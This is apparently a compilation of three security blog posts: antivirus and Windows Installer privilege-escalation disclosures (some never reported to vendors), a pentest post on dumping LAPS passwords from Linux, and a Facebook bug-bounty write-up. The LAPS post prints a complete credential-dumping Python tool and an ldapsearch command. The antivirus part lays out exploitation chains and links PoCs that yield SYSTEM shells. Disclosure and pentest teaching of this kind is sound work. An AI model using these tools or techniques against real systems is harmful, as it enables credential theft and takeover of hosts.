At the end of the hardlink creation process, you can see that both of them have been marked for deletion; we can probably abuse this to achieve an arbitrary file deletion bug.

I’ve created an exploit for the issue. The exploit creates a file inside C:\stage0 and continuously looks for the hardlink. When the hardlink is created, the PoC places an OpLock on it until instup attempts to delete it; then the PoC moves the file away and turns C:\stage0 into a junction to “\RPC CONTROL\”, where we create a symbolic link to redirect the file deletion to an arbitrary file.

Note: This bug wasn’t reported to the vendor.

PoC can be found here

McAfee Total Security

a.   Privilege Escalation

I already found bugs in this AV before and got acknowledged by the vendor for CVE-2020-7279 and CVE-2020-7282.

CVE-2020-7282 was for an arbitrary file deletion issue in McAfee Total Protection and CVE-2020-7279 was for a self-defence bypass.

McAfee Total Security was vulnerable to arbitrary file deletion: creating a junction from C:\ProgramData\McAfee\Update to an arbitrary location resulted in arbitrary file deletion. The security patch changed how the McAfee Total Security updater handles reparse points.

But most importantly, C:\ProgramData\McAfee\Update is actually protected by the self-defence driver, so even an administrator couldn’t create files in this directory. The bypass was done by opening the directory for GENERIC_WRITE access and then creating a mount point to the target directory, so as soon as the updater starts it deletes the target directory’s subcontent.

But now a lot has changed; the directory now has subcontent (previously it was empty by default).

I did some analysis on how they fixed the self-defence bug. Instead of preventing the directory from being opened with GENERIC_WRITE (as I expected), they blocked the control codes FSCTL_SET_REPARSE_POINT and FSCTL_SET_REPARSE_POINT_EX from being called on a protected filesystem component. I expected them to miss FSCTL_SET_REPARSE_POINT_EX, but no, they made a smart move in this case. So if we don’t bypass the self-defence, we don’t have any actual impact on the component.

So this is it, this is as far as I can go… or is it?

b.   Novel way to bypass the self-defence

This method works against any antivirus that uses a filesystem filter for self-protection.

So how does the kernel filter work?

The filesystem filter restricts access to antivirus-owned objects by intercepting user-mode file I/O requests: if a request comes from an antivirus component it will be granted; if not, it returns access denied.

You can read more about that here. I’ve already written some such filters myself, but for private usage, so for the moment I can’t disclose them; there are plenty of examples you can find, for example: here.

So as far as I know there are two ways to bypass the filter:

1.     Make a special call so that what the driver sees conflicts with what actually happens

2.     Request access from a protected component

The special-call way was patched in CVE-2020-7279, so the option that remains is the second one. How can we do that?

The majority of AV GUIs support a file dialog to select something. Take for example the McAfee file shredder, which opens a file dialog to let you pick a file.

While the file dialog is meant for picking files, it can be weaponized against the AV. To better understand this we need some example code, so I had to look at the API Microsoft provides for this. Generally apps use either GetOpenFileNameW or the IFileDialog interface, and since GetOpenFileNameW seems to be a bit deprecated we will focus on the IFileDialog interface.

So I created some sample code (it looks horrible but it still does the job).

After running the code:

It looks like the work is being done by the process itself, not by an external process (such as explorer.exe), so technically anything we do in the dialog is considered to be done as that process.

Hold on, if things are done by the process itself, doesn’t that mean we can create a folder in a protected location? Yes we can.

c.   Weaponizing the self-protection bypass

The CVE-2020-7282 patch added a simple check against reparse points before deleting any directory.

The check works like this: if the FSCTL_GET_REPARSE_POINT control on a directory returns anything except STATUS_NOT_A_REPARSE_POINT, the target will be removed; otherwise the updater will delete the subcontent as “NT AUTHORITY\SYSTEM”.
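
For illustration, a user-mode check of that kind (a hypothetical sketch, not McAfee’s actual code; the target path is the one from the article) could look like this:

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>

/* Returns TRUE if the path carries reparse data (junction/symlink), FALSE otherwise. */
static BOOL IsReparsePoint(const wchar_t *path)
{
    BYTE buffer[16 * 1024];
    DWORD bytesReturned = 0;
    BOOL isReparse;

    HANDLE h = CreateFileW(path, FILE_READ_ATTRIBUTES,
                           FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                           NULL, OPEN_EXISTING,
                           FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT,
                           NULL);
    if (h == INVALID_HANDLE_VALUE)
        return FALSE;

    /* Succeeds only if the directory actually is a reparse point;
     * on a plain directory it fails with ERROR_NOT_A_REPARSE_POINT. */
    isReparse = DeviceIoControl(h, FSCTL_GET_REPARSE_POINT, NULL, 0,
                                buffer, sizeof(buffer), &bytesReturned, NULL);
    CloseHandle(h);
    return isReparse;
}

int main(void)
{
    printf("reparse point: %d\n",
           IsReparsePoint(L"C:\\ProgramData\\McAfee\\Update"));
    return 0;
}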

Chaining it together, I have an exploit which demonstrates the bug. First a directory C:\updmgr is created, and then you manually move it to C:\ProgramData\McAfee\Update. An opportunistic lock triggers the PoC to create a reparse point to the target as soon as the AV GUI attempts to move the folder; the PoC turns it into a reparse point and locks the moved directory so the reparse point cannot be deleted.

PoC can be found here

Avira Antivirus

I’m gonna do the tests on Avira Prime. Not gonna lie, Avira has the easiest way to download their antivirus, unlike other vendors who crack your head before they give you a trial. I really feel bad for disclosing this bug.

Anyway, it looks like there’s a feature that comes with Avira Prime called Avira System Speedup Pro. I still can’t explain why this behaviour exists in the Avira System Speedup feature, but it does.

When starting the Avira System Speedup Pro GUI there’s an initialization done by the service “Avira.SystemSpeedup.Service.exe”, which is written in C#, making the service easier to reverse. I reversed it, but things just didn’t make any sense, so I guess it’s better to show the Process Monitor output to understand the issue.

When opening the GUI, I assume there’s RPC communication between the GUI and the service to perform the required initialization in order to serve the user’s needs. While the service begins the initialization process, it creates and removes a directory in C:\Windows\Temp\Avira.SystemSpeedup.Service.madExcept without even checking for reparse points. It’s extremely easy to abuse the issue.

This time, instead of writing a C++ PoC, I’ll write a simpler one as a batch script. The PoC in this case doesn’t need any user interaction and will delete the targeted directory’s subcontent.

PoC can be found here

Trend Micro Maximum Security

One of the best AVs I’ve ever seen, but unluckily this disclosure puts this antivirus on the blacklist too.

I already discovered an issue in Trend Micro which was patched as CVE-2020-25775, and I literally just found another high-severity issue in Trend Micro, but I was contracted for that one so I can’t disclose it here.

Moving on, like other AVs it has a PC Health Checkup feature, and it’s probably worth our attention.

While browsing through the component, I noticed there’s a “Clean Privacy Data” feature.

I clicked on MS Edge and cleaned it; the output from Process Monitor was:

And as you see, the Trend Micro Platinum Host Service is deleting a directory in a user-writable location without a proper check against reparse points while running as “NT AUTHORITY\SYSTEM”, which is easily abusable by a user to delete arbitrary files.

There’s nothing more to say. I created a proof of concept as a batch script; after running it, expect the target directory’s subcontent to be deleted.

PoC can be found here

MalwareBytes

Yup, another good AV. I’ve already engaged with this antivirus and, as usual, I got a bug. Five months have passed since I reported it and they still haven’t patched the issue, and since they paid the bounty I can’t disclose that bug. But as usual, PAPA has candies for you!

I will be using the same technique explained above to bypass the self-protection.

While checking for updates, the antivirus looks for a non-existent directory.

Hmmmm, let’s take a look.

The pic shown above shows us that the Malwarebytes antivirus engine is deleting every subcontent of C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate\test.txt.txt, and since there’s no impersonation of the user and literally no proper check against reparse points, we can probably abuse that: by creating a directory there and creating a reparse point inside C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate, we can redirect the file deletion to an arbitrary location.

The PoC can be found here

Kaspersky

The AV I engaged with the most: about 11 bugs were reported, and 3 of them were fixed.

For the moment I will be talking about a bug which I already disclosed here. The PoC will spawn a SYSTEM shell as soon as it succeeds. The bug seems to still exist on Kaspersky Total Security with the latest December 2020 security patches; the only issue you will have is that the AV will detect the exploit as malware, so you must do some modification to prevent your exploit from being deleted. I can confirm that the issue still exists.

One more thing

There’s another issue I discovered in all of Kaspersky’s antiviruses which allows arbitrary file overwrite without user interaction. I’ve already reported the bug to Kaspersky but they didn’t give me a bug bounty.

They said the issue isn’t eligible for a bug bounty because the reproduction is unstable. Ain’t gonna lie, I gave them a horrible proof of concept, but it still does the job, so I guess it should have been rewarded, since they state that they give bounties. I won’t give bugs away for free like a fool.

So let’s dive into the bug: when any user starts Mozilla Firefox, Kaspersky writes a special file in %Firefox_Dir%\defaults\pref while not impersonating the user and without doing proper link checks. If abused correctly, this can be used against the AV to trigger an arbitrary file overwrite on demand without user interaction.

A proof of concept implementing the issue is attached; I’ve rewritten a new one which will trigger it on demand, thank me later.

PoC can be found here

Windows

I was about to disclose bugs in ESET and Bitdefender but I don’t have time to write more, so here’s the last one.

First, if you’re not familiar with Windows Installer CVE-2020-16902: it’s literally the 6th time I am bypassing this security patch, and they still don’t hire security researchers. I will be using the same package as in CVE-2020-16902.

Microsoft patched the issue by checking whether C:\Config.Msi exists: if it does not, it will be used to generate the rollback directory; otherwise, if it exists, C:\Windows\Installer\Config.msi will be used as the folder for the rollback files.

A tweet by SandboxEscaper mentioned that if the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” exists when the installation begins, the Windows Installer will use C:\Config.Msi as the directory for rollback files. As an unprivileged user, I guess there’s no way to prevent the deletion of that key or to create “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” ourselves.

And as usual, there’s always something worth our attention.

When the directory is deleted, there’s an additional check whether the directory still exists or not, which is kinda strange since RemoveDirectory returned TRUE.

I guess there should be no need for additional checks, so I was pretty sure there’s a bug there: I managed to re-create the directory as soon as the installer deleted it, and this happened.

The installer checked whether the directory exists and found that it does, so the Windows Installer won’t delete the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi”, because the directory wasn’t deleted.

During the next installation, C:\Config.Msi will be used to save rollback files, which can be easily abused (I’ve already done that in CVE-2020-1302 and CVE-2020-16902).

I’ve provided a PoC as a C++ project to exploit the issue; it’s a double click to a SYSTEM shell, thank me later again.

PoC can be found here

Note: I am not responsible for any usage of these disclosures, you’re on your own.

Dumping LAPS Passwords from Linux

Original text by N00PY

Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux.  I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host, and one being from a “dropbox” typically running Kali Linux or similar OS.  The former being more popular on “red team” type engagements, and the latter more for traditional internal penetration testing.  As a penetration tester who works primarily off of a Linux host, I prefer to use tooling native to my own system.

Today’s topic is about how to dump LAPS passwords from Linux.  If you have not yet heard of LAPS, it is Microsoft’s solution to the problem of local administrator password re-use. Before LAPS, administrators would typically set the RID 500 account password to the same value on every computer.  This was so that they could access a machine in the event that domain authentication was not available or desired. One password was used for all systems as it wasn’t practical or simple to manage that many unique passwords.  This of course was then exploited by penetration testers for decades, as they could compromise a single host, dump the RID 500 password hash, and use it to authenticate to any computer on the domain via the local admin account.

The way LAPS works is relatively simple.  A client side component on each computer generates a random password.  The password gets stored in Active Directory, in an attribute of the computer object.  Only Domain Admins are able to view the value of the attribute.  The client generates a new password every so often as determined by the configuration and updates Active Directory with the new password and the expiration time.

Like most Active Directory issues, the problems stem from misconfigurations.  Typically users who are not in the Domain Admins group will need local admin access to systems, such as helpdesk personnel.  Because of this, the ability to read LAPS passwords for computer objects will be delegated to other groups beyond just the Domain Admins group.  This may be all computer objects or just objects within a certain OU.  Over time, this privilege will often be granted to groups that it should not have been.  Also, if an account or group has ownership over a computer object, they can modify permissions on the system to be able to view the password.

Personally I’ve seen multiple cases in which regular domain users are able to read LAPS passwords, either just for a few systems or 50+ within the domain.

If you have the permissions, reading this attribute is easy by using the PowerShell Get-AdmPwdPassword cmdlet. The objective of this post however is to describe how to do this without needing any access to a Windows host.

To do this from Linux, you can use LAPSDumper.  This is available on Github, but I’ll also paste the full source here as the code is quite simple.

#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse

parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
parser.add_argument('-u', '--username', help='username for LDAP', required=True)
parser.add_argument('-p', '--password', help='password for LDAP (or LM:NT hash)', required=True)
parser.add_argument('-l', '--ldapserver', help='LDAP server (or domain)', required=False)
parser.add_argument('-d', '--domain', help='Domain', required=True)

def base_creator(domain):
    search_base = ""
    base = domain.split(".")
    for b in base:
        search_base += "DC=" + b + ","
    return search_base[:-1]

def main():
    args = parser.parse_args()
    if args.ldapserver:
        s = Server(args.ldapserver, get_info=ALL)
    else:
        s = Server(args.domain, get_info=ALL)
    c = Connection(s, user=args.domain + "\\" + args.username, password=args.password, authentication=NTLM, auto_bind=True)
    c.search(search_base=base_creator(args.domain), search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))', attributes=['ms-MCS-AdmPwd', 'SAMAccountname'])
    for entry in c.entries:
        print(str(entry['sAMAccountName']) + ":" + str(entry['ms-Mcs-AdmPwd']))

if __name__ == "__main__":
    main()

This tool will pull every LAPS password the account has access to read within the entire domain.  The usage is simple, and the syntax mirrors that of other popular tools.  It is also pass the hash (PtH) compatible.

$ python laps.py -u user -p password -d domain.local
 
COMPUTER01$:B#g4%aI$K!yZ)q}
COMPUTER02$:n-6pW-n8L!o8Of]
COMPUTER03$:u2Oc9z&{R)fHA2J
COMPUTER04$:Rwb2#4,{@N4Y19v
COMPUTER05$:17aZ,+1L5L((D0F
COMPUTER06$:DNX&@e.8XTQhyPj
COMPUTER07$:U3ZXf0vX!Xm1P89
COMPUTER08$:.6IvTd7-85ytJeF
COMPUTER09$:P2(VSN4%49!%fI8

This will dump the computer name and the password for the local administrator account delimited with a colon.  A simple modification of line 27 can allow you to dump it formatted however you please.

Additional reading on LAPS:

Update Dec 20, 2020

I forgot to mention, this is also simple to do from ldapsearch, using this syntax or similar:

ldapsearch -x -h <ldap server> -D "<username>@<domain>" -w <password> -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd

One thing I wanted to add however is the ability to pass the hash. PtH is particularly useful when you dump an IT admin hash that won’t crack, or when using a compromised machine account.  If you have a plaintext password for the user, ldapsearch works just as well.

How I hacked Facebook: Part One

Original text by Alaa Abdulridha

We’ve been in this pandemic since March, and once the pandemic started I had plenty of free time and needed to use it wisely. So I decided to take the OSWE certification and finished the exam on the 8th of August. After that, I took a couple of weeks to recover from the OSWE exam. Then in the middle of September I said, you know what? I haven’t registered my name in the Facebook hall of fame for 2020 as I do every year. Okay, let’s do it.

I had never found a vulnerability in one of Facebook’s subdomains, so I took a look at some writeups and saw one about a Facebook subdomain which got all my attention. It was a great write-up, you can check it out: [HTML to PDF converter bug leads to RCE in Facebook server].

After reading this write-up I got a good idea of how many vulnerabilities I could find in such a huge web app.

So my main target was https://legal.tapprd.thefacebook.com and my goal was RCE or something similar.

I ran some fuzzing tools just to enumerate the endpoints of this web app, took a 2-hour nap and watched a movie. Then I got back to see the results, and okay, I got some good results.

Dirs found with a 403 response:

/tapprd/
/tapprd/content/
/tapprd/services/
/tapprd/Content/
/tapprd/api/
/tapprd/Services/
/tapprd/temp/
/tapprd/logs/
/tapprd/logs/portal/
/tapprd/logs/api/
/tapprd/certificates/
/tapprd/logs/auth/
/tapprd/logs/Portal/
/tapprd/API/
/tapprd/webroot/
/tapprd/logs/API/
/tapprd/certificates/sso/
/tapprd/callback/
/tapprd/logs/callback/
/tapprd/Webroot/
/tapprd/certificates/dkim/
/tapprd/SERVICES/

Okay, I think this result is more than enough to support my previous theory about how huge this application is. Then I started to read the JavaScript files to see how the website works and what methods it uses, etc.

I noticed a way to bypass the redirection to the SSO login page, https://legal.tapprd.thefacebook.com/tapprd/portal/authentication/login, and after analyzing the login page, I noticed this endpoint:

/tapprd/auth/identity/user/forgotpassword

and after doing some fuzzing on the user endpoint I noticed another endpoint, /savepassword, which was expecting a POST request. Then, after reading the JavaScript files, I knew how the page works: there should be a generated token and an xsrf token, etc. The first idea that came to me was okay, let’s test it and see if it works. I tried to change a password manually using Burp Suite, but I got an error; the error was “execution this operation failed”.

I said okay, this might be because the email is wrong or something? Let’s get an admin email. Then I started putting random emails in a list to make a wordlist, and after that I used Intruder and said let’s see what happens.

I got back after a couple of hours and found the same error results plus one other result. This one was a 302 redirect to the login page. I said wow, I’ll be damned if this worked, haha.

So let’s get back to see what I’ve done here: I sent requests using Intruder with a CSRF token and random emails with a new password to the /savepassword endpoint, and one of the results was a 302 redirect.


Now I went to the login page, entered the login email and the new password, and BOOM, I logged in successfully to the application and could enter the admin panel 🙂


I read the report of the hacker who previously found RCE using the PDF, and they gave him a reward of only $1000, so I said okay, let’s make a good impact here and a perfect exploit.

I wrote a quick and simple Python script to exploit this vulnerability: you provide the email and the new password, and the script changes the password.


The impact here was very high because Facebook workers used to log in with their Workplace accounts, which means they’re using their Facebook account access tokens, and if another attacker wanted to exploit this it might give him the ability to gain access to some Facebook workers’ accounts, etc.

Then I reported the vulnerability and the report was triaged.

And on the 2nd of October, I received a bounty of $7500.


I enjoyed exploiting this vulnerability so much that I said that’s not enough, this is a weak script! Let’s dig more and more.

And I found two more vulnerabilities in the same application, but we will talk about those in the Part Two writeup 🙂

You can read the write-up on my website : https://alaa.blog/2020/12/how-i-hacked-facebook-part-one/

And you can follow me on twitter : https://twitter.com/alaa0x2

Cheers.